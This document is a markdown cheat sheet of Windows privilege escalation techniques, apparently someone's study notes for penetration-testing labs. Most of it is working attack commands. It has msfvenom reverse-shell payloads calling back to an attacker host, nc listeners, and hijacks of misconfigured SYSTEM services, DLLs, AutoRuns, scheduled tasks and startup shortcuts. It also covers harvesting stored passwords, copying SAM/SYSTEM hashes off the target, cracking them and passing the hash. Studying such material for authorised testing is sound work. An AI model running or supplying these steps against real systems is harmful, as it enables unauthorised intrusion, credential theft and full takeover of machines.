# Windows Privilege Escalation Techniques
> 20.07.2021 | [notes](https://gitlab.com/be3ru5/notes/-/blob/master/PrivEsc/WindowsNotes.md)
_______

**> reverse shell:**
```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<port> -f exe -o reverse.exe

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<port> -f dll -o reverse.dll

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<port> -f msi -o reverse.msi
```

before running winpisses: `reg add HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1`

## kernel exploits:

Kernel exploits can often be unstable and may be one-shot or cause a system crash. Use as last option.

\> target:
```
sysinfo > sysinfo.txt
```

get file to host

\> host:
```
./wes.py <file> -i "privilege" --exploits-only 
```

Look for CVE exploits at [Windows kernel CVE exploits](https://github.com/SecWiki/windows-kernel-exploits)

## service exploits:

If services run with SYSTEM privileges and are misconfigured, exploiting them may lead to command execution with SYSTEM privileges as well.

\> **service commands:**

- query the configuration of a service: `sc.exe qc <service>`
- query the current status of a service: `sc.exe query <service>`
- modify the configuration option of a service: `sc.exe config <service> <option>= <value>`
- start/stop service: `net start/stop <service>`

\> **service misconfiguration:**

* insecure service properties *(DACL service)*
* unquoted service path
* weak registry permission
* insecure service executable
* DLL hijacking

to find service misconfiguration: 
```
.\winPEASany.exe quiet servicesinfo
```

### Insecure Service Permission:

If our user has permission to change the configuration of a service which runs with SYSTEM privileges, we can change the executable the service uses to one of our own

> **Potential Rabbit Hole:** If you can change a service configuration but cannot stop/start the service, you may not be able to escalate privileges!

\> target:

> `daclsvc(DACL Service)["C:\Program Files\DACL Service\daclservice.exe"] - Manual - Stopped`

query user's permissions:
```
.\accesschk.exe /accepteula -uwcqv <user> <service>
```

Check the current configuration of the service:
```
sc qc <service>
```

Check the current status of the service: *(stop is running)*
```
sc query <service>
```

Reconfigure the service to use our reverse shell executable:
```
sc config <service> binpath= "\"<path to reverse shell>""
```

\> host:
```
nc -lnvp <port>
```

\> target:
```
net start <service>
```

### unquoted service path:

Consider the following unquoted path: `C:\Program Files\Some Dir\SomeProgram.exe` To use, this obviously runs `SomeProgram.exe`. To Windows, `C:\Program` could be the executable, with two arguments: `“Files\Some”` and `“Dir\ SomeProgram.exe”` Windows resolves this ambiguity by checking each of the possibilities in turn. If we can write to a location Windows checks before the actual executable, we can trick the service into executing it instead.

\> target:

to find service misconfigurations:
```
.\winPEASany.exe quiet servicesinfo
```
> `unquotedsvc(Unquoted Path Service)[C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe] - Manual - Stopped`

> Confirm this using sc: `sc qc <service>` *in this case `unquotedsvc`*

use `accesschk.exe` to check for write permissions:

\> example: *see yellow box*

![unquoted](imgs/unquoted.png)

copy the reverse shell executable and rename it appropriately: *in this case `common.exe`*
```
copy <reverse shell's path> <target path> 
```

\> host:
```
nv -lnvp <port>
```

\> target:
```
net start <service>
```

### weak registry permissions:

registry entries can have ACLs, if the ACL is misconfigured, it may be possible to modify a service’s configuration even if we cannot modify the service directly.

\> target:

> `regsvc(Insecure Registry Service)["C:\Program Files\Insecure Registry Service\insecureregistryservice.exe"] - Manual - Stopped`

confirm this with `accesschk.exe`:
```
.\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\<service>
```

alternatively `PowerShell` can be used to confirm:
```
Get-Acl HKLM:\System\CurrentControlSet\Services\regsvc | Format-List
```

Overwrite the ImagePath registry key to point to our reverse shell executable:
```
reg add HKLM\SYSTEM\CurrentControlSet\services\<service> /v ImagePath /t REG_EXPAND_SZ /d <path to reverse shell> /f
```

\> host:
```
nv -lnvp <port>
```

\> target:
```
net start <service>
```

### insecure service executable

If the original service executable is modifiable by our user, we can simply replace it with our reverse shell executable.

\> target:

if service appears to be writable by everyone confirm this with `accesschk.exe`:
```
.\accesschk.exe /accepteula -quvw <path of service exe>
```

create a backup of the original service executable:
```
copy <path of service exe> C:\Temp
```

copy the reverse shell executable to overwrite the service executable:
```
copy /Y <path of reverse shell> <path of service exe>
```

\> host:
```
nc -lnvp <port>
```

\> target:
```
net start <service>
```

### DLL hijacking

A more common misconfiguration that can be used to escalate privileges is if a DLL is missing from the system, and our user has write access to a directory within the PATH that Windows searches for DLLs in.

\> target:

> `dllsvc(DLL Hijack Service)["C:\Program Files\DLL Hijack Service\dllhijackservice.exe"] - Manual - Stopped`

check a directory which is writable and in the PATH

Start by enumerating which of these services our user has stop and start access to:
```
.\accesschk.exe /accepteula -uvqc <user> <target serivce>
```

query of executable run by target service:
```
sc qc <target service>
```

\> start a local windows VM:

get the *target_service* on VM

get the executable of target service to the Windows VM along with exact path.

Run `Procmon64.exe` with administrator privileges. Press *Ctrl+L* to open the Filter menu.

Add a new filter on the Process Name matching `target executable`

deselecte registry activity and network activity.

```
net start <target service>
```

Back in Procmon, find for errors appear, associated with the `.dll` file.

look for Windows tries to find the file in the directory, which is writable by our user.

*example:*

![dll](imgs/dllhijack.png)

\> host:

```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<host IP> LPORT=<port> -f dll -o <missing file name>.dll
```
copy the malicious DLL to the target where our user has permission to `write`
```
nc -lnvp <port>
```

\> target:
```
net start <target service>
```

## registry exploits:

### AutoRuns

If you are able to write to an AutoRun executable, and are able to restart the system (or wait for it to be restarted) you may be able to escalate privileges.

\> target:
```
.\winPEASany.exe quiet applicationsinfo
```
*manual check:*
```
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
```

`accesschk.exe` to verify the permissions on each one:
```
.\accesschk.exe /accepteula -wvu <path of autorun executable>
```

when AutoRun executable is writable by our user. Create a backup of the original:
```
copy <path of autorun executable> C:\Temp
```

copy our reverse shell executable to overwrite the AutoRun executable:
```
copy /Y <reverse shell path> <path of autorun executable>
```

\> host:
```
nc -lnvp <port>
```

\> target:

restart the target to trigger autorun executable or wait for it to be restart.

*Note that on Windows 10, the exploit appears to run with the privileges of the last logged on user*

### AlwaysInstallElevated:

# VM needs to be reset

## passwords:

Windows can be especially vulnerable to this, as several features of Windows store passwords insecurely.

### registry:

\> target:
```
.\winPEASany.exe quiet filesinfo userinfo
```

*manual query*
```
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s
```

\> host:
```
winexe -U '<username>%<password>' //<target IP> cmd.exe
```

### saved credentials:

### Configuration Files

Recursively search for files in the current directory with “pass” in the name, or ending in “.config”: `> dir /s *pass* == *.config`

Recursively search for files in the current directory that contain the word “password” and also end in either .xml, .ini, or .txt: `> findstr /si password *.xml *.ini *.txt`

\> target:
```
.\winPEASany.exe quiet cmd searchfast filesinfo
```

check *Unattend Files* section in the result. view result files for passwords

### SAM/SYSTEM Locations

*security account manager*

Windows stores password hashes in the *SAM*. 
The hashes are encrypted with a key which can be found in a file named *SYSTEM*.
If you have the ability to read the *SAM* and *SYSTEM* files, you can extract the hashes.

\> target:
```
.\winPEASany.exe quiet cmd searchfast filesinfo
```
check *Looking for common SAM & SYSTEM backups* section in the result.
```
copy <SAM backup path> \\<host IP>\<path to copy>\
copy <SYSTEM backup path> \\<host IP>\<path to copy>\
```

\> host:
```
samdump2 SYSTEM SAM
```
save `admin`'s hash in a file `hash`
```
john --format=NT --rules -w=<wordlist> hash
``` 

### Passing the Hash

Windows accepts hashes instead of passwords to authenticate to a number of services.

Extract the admin hash from the SAM in the previous step.
```
pth-winexe -U 'admin%<admin's hash>' //<target IP> cmd.exe
```
to spawn a system level command prompt:
```
pth-winexe --system -U 'admin%<admin's hash>' //<target IP> cmd.exe
```
## scheduled tasks:

Tasks usually run with the privileges of the user who created them, however administrators can configure tasks to run as other users, including SYSTEM.

Unfortunately, there is no easy method for enumerating custom tasks that belong to other users as a low privileged user account.

List all scheduled tasks your user can see:
```
schtasks /query /fo LIST /v
```
*powershell:*
```
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
```

Often we have to rely on other clues, such as finding a script or log file that indicates a scheduled task is being run.

- if we have the ability to write to file/script
- backup the script:
- start a listener on Kali
- use echo to append a call to our reverse shell executable to the end of the script
- Wait for the scheduled task to run to complete the exploit.

## insecure GUI apps:

On some (older) versions of Windows, users could be granted the permission to run certain GUI apps with administrator privileges.

There are often numerous ways to spawn command prompts from within GUI apps, including using native Windows functionality.

Since the parent process is running with administrator privileges, the spawned command prompt will also run with these privileges.

## startup apps:

Each user can define apps that start when they log in, by placing
shortcuts to them in a specific directory.

If we can create files in this directory, we can use our reverse shell
executable and escalate privileges when an admin logs in.

*Note that shortcut files (.lnk) must be used.*
the following VBScript `.vbs` can be used to create a shortcut file:
```
Set oWS = WScript.CreateObject("WScript.Shell")
sLinkFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\reverse.lnk"
Set oLink = oWS.CreateShortcut(sLinkFile)
oLink.TargetPath = "<reverse shell's path>"
oLink.Save
```

## installed apps:

Most privilege escalations relating to installed applications are based on mis-configurations we have already covered.

Still, some privilege escalations results from things like buffer overflows, so knowing how to identify installed applications and known vulnerabilities is still important.

Manually enumerate all running programs:
```
tasklist /v
```

We can also use Seatbelt to search for nonstandard processes:
```
seatbelt.exe NonstandardProcesses
```
winPEAS also has this ability - *note 'processinfo' / 'procesinfo'*
```
winPEASany.exe quiet procesinfo
```

Once you find an interesting process, try to identify its version. Use Exploit-DB to search for a corresponding exploit.

![exploitdb](imgs/exploitdb.png)

## popular exploits:

these exploits are for windows 7/vista/8/8.1. also works on some early versions of windows 10. 

1. hot potato
2. juicy potato

## port forwarding:

Sometimes it is easier to run exploit code on Kali, but the vulnerable program is listening on an internal port. In these cases we need to forward a port on Kali to the internal port on Windows. We can do this using a program called *plink.exe*

The general format of a port forwarding command using *plink.exe*:

\> target:
```
plink.exe <host_user>@<host_IP> -R <host-port>:<target_IP>:<target_port>
```
*Note that the `target_IP` is usually local (e.g. 127.0.0.1)*

`plink.exe` requires you to SSH to Kali, and then uses the SSH tunnel to forward ports.

\> host:
```
winexe -U '<user>%<password>' //120.0.0.1 cmd.exe
```
